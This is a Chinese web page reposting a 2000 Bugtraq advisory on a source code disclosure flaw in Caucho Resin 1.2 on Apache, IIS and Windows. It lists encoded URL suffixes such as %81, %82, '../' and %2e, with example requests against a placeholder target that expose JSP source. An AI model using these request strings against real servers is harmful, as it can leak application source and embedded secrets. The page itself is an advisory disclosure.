当前位置: 首页 > 图文教程 > 网络编程 > JSP > Resin 1.2 重要源代码暴露漏洞

JSP
JDBC 入门(一) - 开始
JDBC 入门(二) - 建立联接
JDBC 入门(三) - 设置表
java在Linux下的web应用(一)
java在Linux下的web应用(二)
Servlet开发中JDBC的高级应用
可以使用多个jsp定制标签在JSP中达到接近servelt的处理效果
JSP应用程序开发中安全问题的实例解析
现场纪实—如何入侵基于JSP的网站
windows中双击jar文件即可运行写法
修改Tomcat的主配置文件,增加一个Postgre数据库JDBC连接池。
JSP报表打印的一种简单解决方案
JSP如何保存用户上次登录时间
当Tomcat遭遇JBDC Driver,出现 Cannot create resource instance !
使用jsp生成彩色汉字验证码
基于JDBC的数据库连接池技术研究与应用
JSP数据库连接池的必要性
在JSP页面中实现检索数据的分页显示
在jsp中作HTTP认证的方法
JSP通过JDBC与Oracle相连

JSP 中的 Resin 1.2 重要源代码暴露漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-02   浏览: 38 ::
收藏到网摘: n/a

bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../


IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp